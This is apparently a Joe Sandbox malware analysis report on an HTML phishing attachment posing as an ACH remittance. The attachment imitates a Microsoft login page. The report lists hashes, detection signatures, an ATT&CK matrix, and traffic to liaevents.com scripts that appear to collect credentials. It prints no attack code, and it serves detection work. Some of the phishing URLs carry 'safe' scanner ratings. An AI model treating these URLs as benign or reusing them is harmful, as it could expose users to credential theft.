Edit tour

Windows Analysis Report
Copy_ACH Remittance Inv#1923119-6.htm

Overview

General Information

Sample Name:	Copy_ACH Remittance Inv#1923119-6.htm
Analysis ID:	831057
MD5:	f30c1b043329277c7c3cfa4e1675eb7b
SHA1:	74519d5dee7278368d7f380aba39239714590e0a
SHA256:	21487b8d206a0282088bf32473072f1384743053d315b2a070733e5eb6e88f38
Infos:

Detection

HTMLPhisher

Score:	60
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected HtmlPhish48

HTML document with suspicious title

HTML document with suspicious name

Phishing site detected (based on image similarity)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

chrome.exe (PID: 2220 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5140 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1756,i,4566038418148092488,3146726653025453555,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

chrome.exe (PID: 5936 cmdline: C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Copy_ACH Remittance Inv#1923119-6.htm MD5: 0FEC2748F363150DC54C1CAFFB1A9408)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
10338.0.pages.csv	JoeSecurity_HtmlPhish_48	Yara detected HtmlPhish_48	Joe Security

HTTP traffic detected: POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1Host: accounts.google.comConnection: keep-aliveContent-Length: 1Origin: https://www.google.comContent-Type: application/x-www-form-urlencodedSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __Secure-ENID=6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0; CONSENT=PENDING+070

System Summary

HTML document with suspicious title

Source: file:///C:/Users/user/Desktop/Copy_ACH%20Remittance%20Inv%231923119-6.htm

Tab title: Copy_ACH Remittance Inv%231923119-6.htm

HTML document with suspicious name

Source: Name includes: Copy_ACH Remittance Inv#1923119-6.htm

Initial sample: remit

Source: classification engine

Classification label: mal60.phis.winHTM@29/18@13/12

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1756,i,4566038418148092488,3146726653025453555,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Copy_ACH Remittance Inv#1923119-6.htm
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1836 --field-trial-handle=1756,i,4566038418148092488,3146726653025453555,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

Directory created: C:\Program Files\Google\GoogleUpdater

Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	2 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	3 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	4 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	1 Ingress Tool Transfer	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Copy_ACH Remittance Inv#1923119-6.htm	7%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
liaevents.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
https://getbootstrap.com)	0%	Avira URL Cloud	safe
https://liaevents.com/dir/host11/eac6f69.php	0%	Avira URL Cloud	safe
https://aadcdn.msauthimages.net/dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/illustration?ts=637581648955903606	0%	Avira URL Cloud	safe
https://aadcdn.msauthimages.net/dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/bannerlogo?ts=637584332980548056	0%	Avira URL Cloud	safe
https://liaevents.com/dir/host11/admin/js/mrj.php?ar=cGRm	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
liaevents.com	192.185.88.193	true	false	0%, Virustotal, Browse	unknown
accounts.google.com	142.250.203.109	true	false		high
cdnjs.cloudflare.com	104.17.25.14	true	false		high
maxcdn.bootstrapcdn.com	104.18.10.207	true	false		high
www.google.com	142.250.203.100	true	false		high
cs1227.wpc.alphacdn.net	192.229.221.185	true	false		unknown
part-0032.t-0009.fdv2-t-msedge.net	13.107.237.60	true	false		unknown
clients.l.google.com	142.250.203.110	true	false		high
cs1025.wpc.upsiloncdn.net	152.199.23.72	true	false		unknown
aadcdn.msauthimages.net	unknown	unknown	false		unknown
clients2.google.com	unknown	unknown	false		high
code.jquery.com	unknown	unknown	false		high
cdn.jsdelivr.net	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://liaevents.com/dir/host11/admin/js/mrj.php?ar=cGRm	false	Avira URL Cloud: safe	unknown
https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css	false		high
https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.css	false		high
https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0	false		high
https://liaevents.com/dir/host11/eac6f69.php	false	Avira URL Cloud: safe	unknown
file:///C:/Users/user/Desktop/Copy_ACH%20Remittance%20Inv%231923119-6.htm	true		low
https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard	false		high
https://aadcdn.msauthimages.net/dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/illustration?ts=637581648955903606	false	Avira URL Cloud: safe	unknown
https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1	false		high
https://aadcdn.msauthimages.net/dbd5a2dd-kauaciwxf54qzmo6hfiuo8rdy0xxsmarndelxushccu/logintenantbranding/0/bannerlogo?ts=637584332980548056	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://fontawesome.io	chromecache_146.1.dr, chromecache_155.1.dr	false		high
https://getbootstrap.com)	chromecache_157.1.dr	false	Avira URL Cloud: safe	low
https://github.com/twbs/bootstrap/blob/master/LICENSE)	chromecache_157.1.dr	false		high
http://fontawesome.io/license	chromecache_146.1.dr, chromecache_155.1.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.18.10.207	maxcdn.bootstrapcdn.com	United States	13335	CLOUDFLARENETUS	false
152.199.23.72	cs1025.wpc.upsiloncdn.net	United States	15133	EDGECASTUS	false
142.250.203.100	www.google.com	United States	15169	GOOGLEUS	false
142.250.203.110	clients.l.google.com	United States	15169	GOOGLEUS	false
192.185.88.193	liaevents.com	United States	46606	UNIFIEDLAYER-AS-1US	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
192.229.221.185	cs1227.wpc.alphacdn.net	United States	15133	EDGECASTUS	false
13.107.237.60	part-0032.t-0009.fdv2-t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
104.17.25.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
142.250.203.109	accounts.google.com	United States	15169	GOOGLEUS	false

Private

IP
192.168.2.1
127.0.0.1

General Information

Joe Sandbox Version:	37.0.0 Beryl
Analysis ID:	831057
Start date and time:	2023-03-21 02:28:51 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	light
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	Copy_ACH Remittance Inv#1923119-6.htm
Detection:	MAL
Classification:	mal60.phis.winHTM@29/18@13/12
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
TCP Packets have been reduced to 100
Excluded IPs from analysis (whitelisted): 142.250.203.99, 34.104.35.123, 104.16.89.20, 104.16.86.20, 104.16.85.20, 104.16.88.20, 104.16.87.20, 69.16.175.10, 69.16.175.42
Excluded domains from analysis (whitelisted): logincdn.msauth.net, cdn.jsdelivr.net.cdn.cloudflare.net, cds.s5x3j6q5.hwcdn.net, fs.microsoft.com, aadcdnoriginwus2.azureedge.net, lgincdnvzeuno.ec.azureedge.net, clientservices.googleapis.com, aadcdn.msauth.net, firstparty-azurefd-prod.trafficmanager.net, lgincdnvzeuno.azureedge.net, edgedl.me.gvt1.com, lgincdn.trafficmanager.net, aadcdn.azureedge.net, aadcdn.ec.azureedge.net, update.googleapis.com, aadcdnoriginwus2.afd.azureedge.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtWriteVirtualMemory calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 2905
Category:	downloaded
Size (bytes):	1173
Entropy (8bit):	7.811199816788843
Encrypted:	false
SSDEEP:	24:XuByTjb3w436CJvnuI5wTGPjl2kGKvu3pufqOdyq3/VYHjyK5AXn:X8yz1qCkUYo1ozgt9YHGKe
MD5:	5C7ACF60A2ACAA5C54BF2B2EC6D484D8
SHA1:	F1837FD5DB6DAD498148D7D77438DE693114B042
SHA-256:	EE21196A4F5EF64135B7998E58F1E7210608674E3FDF97B328C1C237E3B184DB
SHA-512:	11516935B1C777D6457B7FB44235F8C8A73BA1313AC8607C16D342EECAE22AE5BFD702CE01DBB2DC63C3D480E89A689C7AA6CAC8D822E306B413534FEE770A77
Malicious:	false
Reputation:	moderate, very likely benign file
URL:	https://aadcdn.msauth.net/shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg
Preview:	..........uV.n$7......iR.+..LN9.oA..5.......nx..S...l..%[..)..=.....z.?/.._......\|{8.4M........^.~w>=>......t.....~.M;.....,....n~}=-.7........U.<>=.._.O.....y9.>.....y...wR.`8..r..q$.....KR...X.....W.....$g'". W<..$..-.2.....h04.O...\|._../.6.)..ax..X...wzT.....2..7....1....C.@8B....d.M..KS8..>... .%=...q....yWF....\..kM.H....<..&.mM..s...%.'G.n..(..h.-.I.S.K...1;..:7.xdvP..y.]....Q$..4.@.2Fp ..Oe.......=.I........F......{....`.............uC..G.....'..E.....dR..g.(.+K.q...?...O.%.@.i..."n...1 .JTm.S..wM.,../.\|H..s.....C.=.B1(.B.f..:K.\.T....c..N...sT..D....T.=..Zt..M2.).FP.h.:.+A.. ^N-$..U.K..n.u.DZ...d.C....s.n.PI..@.4.pi....G..j.5.7l6....Q$...fs....uD......F...e%..}5.S.s.n".9...e&(_.=..oq..F%L...G].....b.`..hi.S.I.8..Y%hM.\|..W....jC.-a..'..%.r..W?...a...H...5.c......v.G..v.G.a....a/.LT.Fv......7.A...@.OcV.......6xcy,l[.wkP..-E...U..J.....1j....2....C+...?.I.Q.C.kM.n...j..5{HV)I...M.G2o......5.....E_..j.....D...^b..+.U..,K2

Source: file://	Matcher: Found strong image similarity, brand: Microsoft cache file: chromecache_152.1.dr	Jump to dropped file
Source: file:///C:/Users/user/Desktop/Copy_ACH%20Remittance%20Inv%231923119-6.htm	Matcher: Found strong image similarity, brand: Microsoft image: 10338.img.0.gfk.csv EE5C8D9FB6248C938FD0DC19370E90BD
Source: file:///C:/Users/user/Desktop/Copy_ACH%20Remittance%20Inv%231923119-6.htm	Matcher: Found strong image similarity, brand: Microsoft image: 10338.2.img.2.gfk.csv 8C5A3AD269ECFB1B43BEB6F9F65A02F5

Source: Joe Sandbox View	IP Address: 104.18.10.207 104.18.10.207
Source: Joe Sandbox View	IP Address: 104.18.10.207 104.18.10.207

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: global traffic	HTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmiedaX-Goog-Update-Updater: chromecrx-104.0.5112.81Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dir/host11/admin/js/mrj.php?ar=cGRm HTTP/1.1Host: liaevents.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /dir/host11/admin/js/mrj.php?ar=cGRm HTTP/1.1Host: liaevents.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /font-awesome/4.7.0/css/font-awesome.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /font-awesome/4.7.0/fonts/fontawesome-webfont.woff2?v=4.7.0 HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_ee5c8d9fb6248c938fd0dc19370e90bd.svg HTTP/1.1Host: logincdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /ajax/libs/font-awesome/4.7.0/css/font-awesome.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"Origin: nullsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_sms_27a6d18b56f46818420e60a773c36d4e.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_fluent_authenticator_b59c16ca9bf156438a8a96d45e33db64.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Chromium";v="104", " Not A;Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /shared/1.0/content/images/picker_verify_call_fe87496cc7a44412f7893a72099c120a.svg HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
